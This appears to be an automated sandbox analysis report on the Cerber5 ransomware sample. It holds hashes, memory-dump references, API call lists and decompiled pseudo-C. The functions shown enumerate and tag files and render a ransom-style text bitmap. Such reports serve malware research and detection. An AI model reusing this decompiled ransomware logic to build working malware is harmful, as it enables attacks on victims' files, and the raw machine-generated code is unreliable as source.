• Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: f644794e91a71f1057660ca353f50eadab9b5e89219755f30f5cb9d390549a6d
                                                                                                                                                                                        • Instruction ID: 59d306ed93d779869febeb52ab6d6f8b2d8b733a6eeca01877ed689ff356df17
                                                                                                                                                                                        • Opcode Fuzzy Hash: f644794e91a71f1057660ca353f50eadab9b5e89219755f30f5cb9d390549a6d
                                                                                                                                                                                        • Instruction Fuzzy Hash: 90F03072B119208B976CCF39BC4461236E3D3986107D5C2BAD809D73B0D730CC578A88
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E00406471(intOrPtr _a8) {
                                                                                                                                                                                        
                                                                                                                                                                                        				if(_a8 != 0x16) {
                                                                                                                                                                                        					goto ( *0x40e29c);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return 1;
                                                                                                                                                                                        			}




                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                                        			E00401EB2(signed int __ecx, intOrPtr* _a4) {
                                                                                                                                                                                        				short _v524;
                                                                                                                                                                                        				char _v532;
                                                                                                                                                                                        				void _v1554;
                                                                                                                                                                                        				short _v1556;
                                                                                                                                                                                        				char _v1564;
                                                                                                                                                                                        				void* _v1660;
                                                                                                                                                                                        				char _v1668;
                                                                                                                                                                                        				short _v1700;
                                                                                                                                                                                        				char _v1708;
                                                                                                                                                                                        				short _v1740;
                                                                                                                                                                                        				char _v1748;
                                                                                                                                                                                        				struct _SYSTEMTIME _v1756;
                                                                                                                                                                                        				struct _FILETIME _v1764;
                                                                                                                                                                                        				struct _FILETIME _v1772;
                                                                                                                                                                                        				intOrPtr _v1776;
                                                                                                                                                                                        				WCHAR* _v1784;
                                                                                                                                                                                        				longlong _v1788;
                                                                                                                                                                                        				long _v1792;
                                                                                                                                                                                        				intOrPtr* _v1796;
                                                                                                                                                                                        				WCHAR* _v1800;
                                                                                                                                                                                        				intOrPtr _v1804;
                                                                                                                                                                                        				WCHAR* _v1808;
                                                                                                                                                                                        				intOrPtr _v1816;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				intOrPtr* _t111;
                                                                                                                                                                                        				WCHAR* _t112;
                                                                                                                                                                                        				longlong _t113;
                                                                                                                                                                                        				short _t116;
                                                                                                                                                                                        				int _t123;
                                                                                                                                                                                        				void* _t127;
                                                                                                                                                                                        				void* _t131;
                                                                                                                                                                                        				void* _t138;
                                                                                                                                                                                        				void* _t140;
                                                                                                                                                                                        				signed int _t167;
                                                                                                                                                                                        				WCHAR* _t177;
                                                                                                                                                                                        				WCHAR* _t180;
                                                                                                                                                                                        				WCHAR* _t183;
                                                                                                                                                                                        				WCHAR* _t186;
                                                                                                                                                                                        				WCHAR* _t189;
                                                                                                                                                                                        				WCHAR* _t192;
                                                                                                                                                                                        				WCHAR* _t195;
                                                                                                                                                                                        				WCHAR* _t198;
                                                                                                                                                                                        				WCHAR* _t201;
                                                                                                                                                                                        				WCHAR* _t204;
                                                                                                                                                                                        				WCHAR* _t207;
                                                                                                                                                                                        				WCHAR* _t210;
                                                                                                                                                                                        				WCHAR* _t213;
                                                                                                                                                                                        				WCHAR* _t216;
                                                                                                                                                                                        				WCHAR* _t219;
                                                                                                                                                                                        				intOrPtr* _t226;
                                                                                                                                                                                        				long _t229;
                                                                                                                                                                                        				WCHAR* _t232;
                                                                                                                                                                                        				signed int _t243;
                                                                                                                                                                                        				long _t244;
                                                                                                                                                                                        				void* _t246;
                                                                                                                                                                                        				void* _t252;
                                                                                                                                                                                        				signed int _t255;
                                                                                                                                                                                        				void* _t257;
                                                                                                                                                                                        				void* _t259;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t230 = __ecx;
                                                                                                                                                                                        				_t257 = (_t255 & 0xfffffff8) - 0x704;
                                                                                                                                                                                        				_v1792 = GetCurrentThreadId();
                                                                                                                                                                                        				_t111 = E004053BD(_t230);
                                                                                                                                                                                        				_t226 = _t111;
                                                                                                                                                                                        				_v1796 = _t226;
                                                                                                                                                                                        				if(_t226 == 0) {
                                                                                                                                                                                        					L53:
                                                                                                                                                                                        					return _t111;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t112 = E004053BD(_t230);
                                                                                                                                                                                        				_v1784 = _t112;
                                                                                                                                                                                        				if(_t112 == 0) {
                                                                                                                                                                                        					L52:
                                                                                                                                                                                        					_t111 = E00405463(_t226);
                                                                                                                                                                                        					goto L53;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t113 = E004053BD(_t230);
                                                                                                                                                                                        				_v1788 = _t113;
                                                                                                                                                                                        				if(_t113 == 0) {
                                                                                                                                                                                        					L51:
                                                                                                                                                                                        					E00405463(_v1784);
                                                                                                                                                                                        					goto L52;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				 *((short*)(_t226 + 4)) = 0;
                                                                                                                                                                                        				_t116 =  *0x42f7a4; // 0x10
                                                                                                                                                                                        				 *_t226 = 0x52627246;
                                                                                                                                                                                        				 *((short*)(_t226 + 0x15)) = _t116;
                                                                                                                                                                                        				while(WaitForSingleObject( *0x42f834, 0xf) != 0) {
                                                                                                                                                                                        					_t242 = _a4;
                                                                                                                                                                                        					_t252 = E00401E83(_a4);
                                                                                                                                                                                        					__eflags = _t252;
                                                                                                                                                                                        					if(_t252 == 0) {
                                                                                                                                                                                        						L50:
                                                                                                                                                                                        						E00405463(_v1788);
                                                                                                                                                                                        						_t226 = _v1796;
                                                                                                                                                                                        						goto L51;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t232 = E00409439(_t252, _t230,  &_v1772);
                                                                                                                                                                                        					_v1800 = _t232;
                                                                                                                                                                                        					__eflags = _t232;
                                                                                                                                                                                        					if(_t232 == 0) {
                                                                                                                                                                                        						E00405463(_t252);
                                                                                                                                                                                        						goto L50;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t123 = _v1772.dwLowDateTime;
                                                                                                                                                                                        					_t235 =  &(_t232[_t123]);
                                                                                                                                                                                        					_v1772.dwHighDateTime =  &(_t232[_t123]);
                                                                                                                                                                                        					StrCpyNW( &_v524, _t232, _t123);
                                                                                                                                                                                        					_t229 =  *(_t252 + 8);
                                                                                                                                                                                        					_t127 = E00402C54( &(_t232[_t123]),  *_t242);
                                                                                                                                                                                        					_pop(0);
                                                                                                                                                                                        					__eflags = _t127;
                                                                                                                                                                                        					if(_t127 == 0) {
                                                                                                                                                                                        						_t243 = 0x2000;
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						_v1788 = _v1788 & 0x00000000;
                                                                                                                                                                                        						asm("stosd");
                                                                                                                                                                                        						_t246 = CreateFileW(_v1808, 0x80000000, 1, 0, 3, 0, 0);
                                                                                                                                                                                        						__eflags = _t246 - 0xffffffff;
                                                                                                                                                                                        						if(_t246 != 0xffffffff) {
                                                                                                                                                                                        							 *0x40f214(_t246,  &_v1788);
                                                                                                                                                                                        							CloseHandle(_t246);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_v1772.dwHighDateTime =  *(_t252 + 0x14);
                                                                                                                                                                                        						_v1772.dwLowDateTime =  *(_t252 + 0x10);
                                                                                                                                                                                        						FileTimeToLocalFileTime( &_v1772,  &_v1764);
                                                                                                                                                                                        						FileTimeToSystemTime( &_v1764,  &_v1756);
                                                                                                                                                                                        						GetDateFormatW(0x400, 1,  &_v1756, 0,  &_v1700, 0x14);
                                                                                                                                                                                        						GetTimeFormatW(0x400, 8,  &_v1756, 0,  &_v1740, 0x14);
                                                                                                                                                                                        						_v1556 = 0;
                                                                                                                                                                                        						memset( &_v1554, 0, 0x3fe);
                                                                                                                                                                                        						_t259 = _t257 + 0xc;
                                                                                                                                                                                        						__eflags = _t229 & 0x00000001;
                                                                                                                                                                                        						if((_t229 & 0x00000001) != 0) {
                                                                                                                                                                                        							_t219 = E0040591C(0x40d070, 2, 0x68262057);
                                                                                                                                                                                        							_t259 = _t259 + 0xc;
                                                                                                                                                                                        							StrCatW( &_v1556, _t219);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						__eflags = _t229 & 0x00000002;
                                                                                                                                                                                        						if((_t229 & 0x00000002) != 0) {
                                                                                                                                                                                        							_t216 = E0040591C(0x40d074, 2, 0xe737ec15);
                                                                                                                                                                                        							_t259 = _t259 + 0xc;
                                                                                                                                                                                        							StrCatW( &_v1556, _t216);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						__eflags = _t229 & 0x00000004;
                                                                                                                                                                                        						if((_t229 & 0x00000004) != 0) {
                                                                                                                                                                                        							_t213 = E0040591C(0x40d078, 2, 0x90281ace);
                                                                                                                                                                                        							_t259 = _t259 + 0xc;
                                                                                                                                                                                        							StrCatW( &_v1556, _t213);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						__eflags = _t229 & 0x00000010;
                                                                                                                                                                                        						if((_t229 & 0x00000010) != 0) {
                                                                                                                                                                                        							_t210 = E0040591C(0x40d07c, 2, 0x4ff7714d);
                                                                                                                                                                                        							_t259 = _t259 + 0xc;
                                                                                                                                                                                        							StrCatW( &_v1556, _t210);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						__eflags = _t229 & 0x00000020;
                                                                                                                                                                                        						if((_t229 & 0x00000020) != 0) {
                                                                                                                                                                                        							_t207 = E0040591C(0x40d080, 2, 0x41cc7f90);
                                                                                                                                                                                        							_t259 = _t259 + 0xc;
                                                                                                                                                                                        							StrCatW( &_v1556, _t207);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						__eflags = _t229 & 0x00000040;
                                                                                                                                                                                        						if((_t229 & 0x00000040) != 0) {
                                                                                                                                                                                        							_t204 = E0040591C(0x40d084, 4, 0x1b2fac60);
                                                                                                                                                                                        							_t259 = _t259 + 0xc;
                                                                                                                                                                                        							StrCatW( &_v1556, _t204);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						__eflags = _t229;
                                                                                                                                                                                        						if(_t229 < 0) {
                                                                                                                                                                                        							_t201 = E0040591C(0x40d08c, 2, 0xc8c3223a);
                                                                                                                                                                                        							_t259 = _t259 + 0xc;
                                                                                                                                                                                        							StrCatW( &_v1556, _t201);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						__eflags = _t229 & 0x00000100;
                                                                                                                                                                                        						if((_t229 & 0x00000100) != 0) {
                                                                                                                                                                                        							_t198 = E0040591C(0x40d090, 2, 0xb487359d);
                                                                                                                                                                                        							_t259 = _t259 + 0xc;
                                                                                                                                                                                        							StrCatW( &_v1556, _t198);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						__eflags = _t229 & 0x00000200;
                                                                                                                                                                                        						if((_t229 & 0x00000200) != 0) {
                                                                                                                                                                                        							_t195 = E0040591C(0x40d078, 2, 0x90281ace);
                                                                                                                                                                                        							_t259 = _t259 + 0xc;
                                                                                                                                                                                        							StrCatW( &_v1556, _t195);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						__eflags = 0x00000400 & _t229;
                                                                                                                                                                                        						if((0x00000400 & _t229) != 0) {
                                                                                                                                                                                        							_t192 = E0040591C(0x40d094, 3, 0x813b63a1);
                                                                                                                                                                                        							_t259 = _t259 + 0xc;
                                                                                                                                                                                        							StrCatW( &_v1556, _t192);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						__eflags = _t229 & 0x00000800;
                                                                                                                                                                                        						if((_t229 & 0x00000800) != 0) {
                                                                                                                                                                                        							_t189 = E0040591C(0x40d098, 2, 0xc1c7544c);
                                                                                                                                                                                        							_t259 = _t259 + 0xc;
                                                                                                                                                                                        							StrCatW( &_v1556, _t189);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						__eflags = _t229 & 0x00001000;
                                                                                                                                                                                        						if((_t229 & 0x00001000) != 0) {
                                                                                                                                                                                        							_t186 = E0040591C(0x40d09c, 2, 0xb97bfa77);
                                                                                                                                                                                        							_t259 = _t259 + 0xc;
                                                                                                                                                                                        							StrCatW( &_v1556, _t186);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t243 = 0x2000;
                                                                                                                                                                                        						__eflags = 0x00002000 & _t229;
                                                                                                                                                                                        						if((0x00002000 & _t229) != 0) {
                                                                                                                                                                                        							_t183 = E0040591C(0x40d0a0, 6, 0x7863e9f7);
                                                                                                                                                                                        							_t259 = _t259 + 0xc;
                                                                                                                                                                                        							StrCatW( &_v1556, _t183);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						__eflags = _t229 & 0x00004000;
                                                                                                                                                                                        						if((_t229 & 0x00004000) != 0) {
                                                                                                                                                                                        							_t180 = E0040591C(0x40d0a8, 2, 0x9f4e4ac2);
                                                                                                                                                                                        							_t259 = _t259 + 0xc;
                                                                                                                                                                                        							StrCatW( &_v1556, _t180);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						__eflags = _t229 & 0x00010000;
                                                                                                                                                                                        						if((_t229 & 0x00010000) != 0) {
                                                                                                                                                                                        							_t177 = E0040591C(0x40d0ac, 2, 0x1d2b18be);
                                                                                                                                                                                        							_t259 = _t259 + 0xc;
                                                                                                                                                                                        							StrCatW( &_v1556, _t177);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t167 = lstrlenW( &_v1556);
                                                                                                                                                                                        						_push(0x32);
                                                                                                                                                                                        						 *((short*)(_t259 + 0x10a + _t167 * 2)) = 0;
                                                                                                                                                                                        						StrFormatByteSizeW(_v1788, _v1784,  &_v1660);
                                                                                                                                                                                        						_push( &_v1564);
                                                                                                                                                                                        						_push( &_v1668);
                                                                                                                                                                                        						_push( &_v1748);
                                                                                                                                                                                        						_push( &_v1708);
                                                                                                                                                                                        						_push(_v1816);
                                                                                                                                                                                        						_push(_v1808);
                                                                                                                                                                                        						_push(E0040591C(0x40d0b0, 0x56, 0x2c86bbcb));
                                                                                                                                                                                        						_push( *_a4);
                                                                                                                                                                                        						E00402B9B(_t229, _t235, _t243, _t252);
                                                                                                                                                                                        						_t257 = _t259 + 0x2c;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					__eflags =  *0x42f79e;
                                                                                                                                                                                        					if( *0x42f79e != 0) {
                                                                                                                                                                                        						__eflags = _t243 & _t229;
                                                                                                                                                                                        						if((_t243 & _t229) == 0) {
                                                                                                                                                                                        							_t229 = _t229 | _t243;
                                                                                                                                                                                        							__eflags = _t229;
                                                                                                                                                                                        							SetFileAttributesW(_v1808, _t229);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t244 = GetTickCount();
                                                                                                                                                                                        						_t138 = E00401A5B(_v1804, _t235, _v1808,  &_v532, _v1776, _v1792, _v1796);
                                                                                                                                                                                        						_t257 = _t257 + 0x14;
                                                                                                                                                                                        						__eflags = _t138;
                                                                                                                                                                                        						if(_t138 != 0) {
                                                                                                                                                                                        							_t140 = GetTickCount() - _t244;
                                                                                                                                                                                        							__eflags = _t140;
                                                                                                                                                                                        							_push(_t140);
                                                                                                                                                                                        							_push(_v1808);
                                                                                                                                                                                        							_push(_v1800);
                                                                                                                                                                                        							_push(E0040591C(0x40d108, 0x29, 0xbfade95f));
                                                                                                                                                                                        							_push( *_a4);
                                                                                                                                                                                        							E00402B9B(_t229, _t235, _t244, _t252);
                                                                                                                                                                                        							_t257 = _t257 + 0x20;
                                                                                                                                                                                        							E004090F6(0, _t235, _t244, _t252, __eflags,  &_v532);
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t230 =  *0x42f7b4 & 0x0000ffff;
                                                                                                                                                                                        					_t131 = _v1804 + 0x17;
                                                                                                                                                                                        					__eflags = _t131;
                                                                                                                                                                                        					memset(_t131, 0, ( *0x42f7a4 & 0x0000ffff) + ( *0x42f7b4 & 0x0000ffff));
                                                                                                                                                                                        					_t257 = _t257 + 0xc;
                                                                                                                                                                                        					E00405463(_t252);
                                                                                                                                                                                        					E00405463(_v1808);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				goto L50;
                                                                                                                                                                                        			}

































































                                                                                                                                                                                        0x00402324
                                                                                                                                                                                        0x00402326
                                                                                                                                                                                        0x0040232b
                                                                                                                                                                                        0x0040232b
                                                                                                                                                                                        0x00402335
                                                                                                                                                                                        0x0040233c
                                                                                                                                                                                        0x00402342
                                                                                                                                                                                        0x00402344
                                                                                                                                                                                        0x00402346
                                                                                                                                                                                        0x00402346
                                                                                                                                                                                        0x0040234d
                                                                                                                                                                                        0x0040234d
                                                                                                                                                                                        0x0040235d
                                                                                                                                                                                        0x00402377
                                                                                                                                                                                        0x0040237c
                                                                                                                                                                                        0x0040237f
                                                                                                                                                                                        0x00402381
                                                                                                                                                                                        0x00402389
                                                                                                                                                                                        0x00402389
                                                                                                                                                                                        0x0040238b
                                                                                                                                                                                        0x0040238c
                                                                                                                                                                                        0x00402390
                                                                                                                                                                                        0x004023a8
                                                                                                                                                                                        0x004023ac
                                                                                                                                                                                        0x004023ae
                                                                                                                                                                                        0x004023b3
                                                                                                                                                                                        0x004023be
                                                                                                                                                                                        0x004023c3
                                                                                                                                                                                        0x00402381
                                                                                                                                                                                        0x004023c4
                                                                                                                                                                                        0x004023d9
                                                                                                                                                                                        0x004023d9
                                                                                                                                                                                        0x004023df
                                                                                                                                                                                        0x004023e4
                                                                                                                                                                                        0x004023e7
                                                                                                                                                                                        0x004023f0
                                                                                                                                                                                        0x004023f0
                                                                                                                                                                                        0x00000000

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00401EC1
                                                                                                                                                                                        • StrCpyNW.SHLWAPI(?,00000000,?), ref: 00401F73
                                                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00401FAA
                                                                                                                                                                                        • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00401FBD
                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00401FC4
                                                                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00401FE2
                                                                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00401FF2
                                                                                                                                                                                        • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000014), ref: 0040200E
                                                                                                                                                                                        • GetTimeFormatW.KERNEL32(00000400,00000008,?,00000000,?,00000014), ref: 00402025
                                                                                                                                                                                        • memset.NTDLL ref: 00402043
                                                                                                                                                                                          • Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
                                                                                                                                                                                          • Part of subcall function 00405463: RtlFreeHeap.NTDLL(00000000,-00000008), ref: 0040549A
                                                                                                                                                                                          • Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1
                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(0000000F), ref: 004023FD
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: FileTime$ErrorFormatLast$CloseCreateCurrentDateFreeHandleHeapLocalObjectSingleSizeSystemThreadWaitmemset
                                                                                                                                                                                        • String ID: 0jt
                                                                                                                                                                                        • API String ID: 1876243802-1607594887
                                                                                                                                                                                        • Opcode ID: 2ddaeaa363e22ee9e12f8f6aa2a1735278c64dce303052f09d8db391096982a9
                                                                                                                                                                                        • Instruction ID: 1b53b1905552076a97b2969ddcceb8c8da28030c795c23ffefdbb6d86413ff05
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ddaeaa363e22ee9e12f8f6aa2a1735278c64dce303052f09d8db391096982a9
                                                                                                                                                                                        • Instruction Fuzzy Hash: E6D1CA72544301ABD320AFA1DD49F9F77ACEF44704F04483AF684F61D2E77899198B9A
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                        			E004086CF(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                        				int _v16;
                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                        				CHAR* _v24;
                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                        				signed int _v32;
                                                                                                                                                                                        				void* _v36;
                                                                                                                                                                                        				void* _v40;
                                                                                                                                                                                        				void* _v44;
                                                                                                                                                                                        				struct HDC__* _v48;
                                                                                                                                                                                        				struct tagRECT _v64;
                                                                                                                                                                                        				struct tagRECT _v80;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				signed int _t63;
                                                                                                                                                                                        				void* _t68;
                                                                                                                                                                                        				CHAR* _t70;
                                                                                                                                                                                        				int _t75;
                                                                                                                                                                                        				void* _t76;
                                                                                                                                                                                        				int _t79;
                                                                                                                                                                                        				signed int _t84;
                                                                                                                                                                                        				void* _t86;
                                                                                                                                                                                        				signed int _t105;
                                                                                                                                                                                        				signed int _t106;
                                                                                                                                                                                        				signed char _t126;
                                                                                                                                                                                        				signed char _t128;
                                                                                                                                                                                        				int _t132;
                                                                                                                                                                                        				void* _t137;
                                                                                                                                                                                        				void* _t138;
                                                                                                                                                                                        				signed int _t143;
                                                                                                                                                                                        				signed int _t148;
                                                                                                                                                                                        				struct HDC__* _t150;
                                                                                                                                                                                        				struct HDC__* _t151;
                                                                                                                                                                                        				int _t157;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                        				_t63 = E004031AF(_a4, __eflags, E00405905(0x40d738, 9, 0xf223c378));
                                                                                                                                                                                        				_pop(_t137);
                                                                                                                                                                                        				_v12 = _t63;
                                                                                                                                                                                        				_t172 = _t63;
                                                                                                                                                                                        				if(_t63 != 0) {
                                                                                                                                                                                        					_push( &_v48);
                                                                                                                                                                                        					_t68 = E004031AF(_v12, _t172, E00405905(0x40d514, 4, 0x22a8cdeb));
                                                                                                                                                                                        					_t138 = _t137;
                                                                                                                                                                                        					_t70 = E004078F0(E004032B8(_t68, _t172), _t138, __edx);
                                                                                                                                                                                        					_v24 = _t70;
                                                                                                                                                                                        					if(_t70 != 0) {
                                                                                                                                                                                        						_t151 = GetDC(0);
                                                                                                                                                                                        						_v48 = _t151;
                                                                                                                                                                                        						if(_t151 != 0) {
                                                                                                                                                                                        							_t150 = CreateCompatibleDC(_t151);
                                                                                                                                                                                        							if(_t150 != 0) {
                                                                                                                                                                                        								_v16 = GetDeviceCaps(_t151, 8);
                                                                                                                                                                                        								_t75 = GetDeviceCaps(_t151, 0xa);
                                                                                                                                                                                        								_v20 = _t75;
                                                                                                                                                                                        								_t76 = CreateCompatibleBitmap(_t151, _v16, _t75);
                                                                                                                                                                                        								_v28 = _t76;
                                                                                                                                                                                        								_t176 = _t76;
                                                                                                                                                                                        								if(_t76 != 0) {
                                                                                                                                                                                        									_v44 = SelectObject(_t150, _t76);
                                                                                                                                                                                        									_t79 = GetDeviceCaps(_t151, 0x5a);
                                                                                                                                                                                        									_t84 = MulDiv(E00403253(E004031AF(_v12, _t176, E00405905( &E0040D744, 4, 0x149d4cf6)), _t176), _t79, 0x48);
                                                                                                                                                                                        									_t86 = CreateFontW( ~_t84, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 4, 0, E0040591C(0x40d74c, 8, 0xaf2a2560));
                                                                                                                                                                                        									_v40 = _t86;
                                                                                                                                                                                        									_t177 = _t86;
                                                                                                                                                                                        									if(_t86 != 0) {
                                                                                                                                                                                        										_v36 = SelectObject(_t150, _t86);
                                                                                                                                                                                        										SetBkColor(_t150, E00403253(E004031AF(_v12, _t177, E00405905(0x40d758, 0xa, 0xac908572)), _t177));
                                                                                                                                                                                        										SetTextColor(_t150, E00403253(E004031AF(_v12, _t177, E00405905(0x40d764, 5, 0xb1a3f726)), _t177));
                                                                                                                                                                                        										_t157 = _v16;
                                                                                                                                                                                        										_v64.left = 0;
                                                                                                                                                                                        										_v64.top = 0;
                                                                                                                                                                                        										_v64.right = _t157;
                                                                                                                                                                                        										_v64.bottom = _v20;
                                                                                                                                                                                        										FillRect(_t150,  &_v64, GetStockObject(2));
                                                                                                                                                                                        										_t105 = _v20 * _t157;
                                                                                                                                                                                        										_t143 = 0xa;
                                                                                                                                                                                        										_t106 = _t105 / _t143;
                                                                                                                                                                                        										_t148 = _t105 % _t143;
                                                                                                                                                                                        										if(_t106 > 0) {
                                                                                                                                                                                        											_v12 = _t106;
                                                                                                                                                                                        											do {
                                                                                                                                                                                        												_v32 = (E004063E1(0xff) & 0x000000ff) << 8;
                                                                                                                                                                                        												_t126 = E004063E1(0xff);
                                                                                                                                                                                        												_t128 = E004063E1(0xff);
                                                                                                                                                                                        												_t132 = E004063E1(_v64.bottom);
                                                                                                                                                                                        												SetPixel(_t150, E004063E1(_v64.right), _t132, _t128 & 0x000000ff | (_t126 & 0x000000ff | _v32) << 0x00000008);
                                                                                                                                                                                        												_t35 =  &_v12;
                                                                                                                                                                                        												 *_t35 = _v12 - 1;
                                                                                                                                                                                        											} while ( *_t35 != 0);
                                                                                                                                                                                        											_t157 = _v16;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										_v80.bottom = _v20;
                                                                                                                                                                                        										_v80.left = 0;
                                                                                                                                                                                        										_v80.top = 0;
                                                                                                                                                                                        										_v80.right = _t157;
                                                                                                                                                                                        										DrawTextA(_t150, _v24, 0xffffffff,  &_v80, 0x411);
                                                                                                                                                                                        										asm("cdq");
                                                                                                                                                                                        										asm("cdq");
                                                                                                                                                                                        										_v64.top = (_v64.bottom - _t148 >> 1) - (_v80.bottom - _t148 >> 1);
                                                                                                                                                                                        										DrawTextA(_t150, _v24, 0xffffffff,  &_v64, 0x11);
                                                                                                                                                                                        										_v5 = E00408485(_v80.bottom - _t148 >> 1, _v28, _a8, _a12, _a16);
                                                                                                                                                                                        										SelectObject(_t150, _v36);
                                                                                                                                                                                        										DeleteObject(_v40);
                                                                                                                                                                                        									}
                                                                                                                                                                                        									SelectObject(_t150, _v44);
                                                                                                                                                                                        									DeleteObject(_v28);
                                                                                                                                                                                        									_t151 = _v48;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								DeleteDC(_t150);
                                                                                                                                                                                        							}
                                                                                                                                                                                        							ReleaseDC(0, _t151);
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v5;
                                                                                                                                                                                        			}

                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 004031AF: lstrcmpi.KERNEL32(?,00000000), ref: 004031E6
                                                                                                                                                                                          • Part of subcall function 004078F0: lstrlen.KERNEL32(00000000,00000000,00000000,00000000), ref: 004078FF
                                                                                                                                                                                          • Part of subcall function 004078F0: StrCmpNIA.SHLWAPI(00000000,00000000,?,?,0000000A), ref: 00407938
                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 00408745
                                                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00408759
                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040876C
                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00408778
                                                                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,00000000,00000000), ref: 00408786
                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00408799
                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004087A7
                                                                                                                                                                                        • MulDiv.KERNEL32(00000000), ref: 004087D4
                                                                                                                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000004,00000000,00000000), ref: 00408802
                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00408815
                                                                                                                                                                                        • SetBkColor.GDI32(00000000,00000000), ref: 00408845
                                                                                                                                                                                        • SetTextColor.GDI32(00000000,00000000), ref: 00408872
